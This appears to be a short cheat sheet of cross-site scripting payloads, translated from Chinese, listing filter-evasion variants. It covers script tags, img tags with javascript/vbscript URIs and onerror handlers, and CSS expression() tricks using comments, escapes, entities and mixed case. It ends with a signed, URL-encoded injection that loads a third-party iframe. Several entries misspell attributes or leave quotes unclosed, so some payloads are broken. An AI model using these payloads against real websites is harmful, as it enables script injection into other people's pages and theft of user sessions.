<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["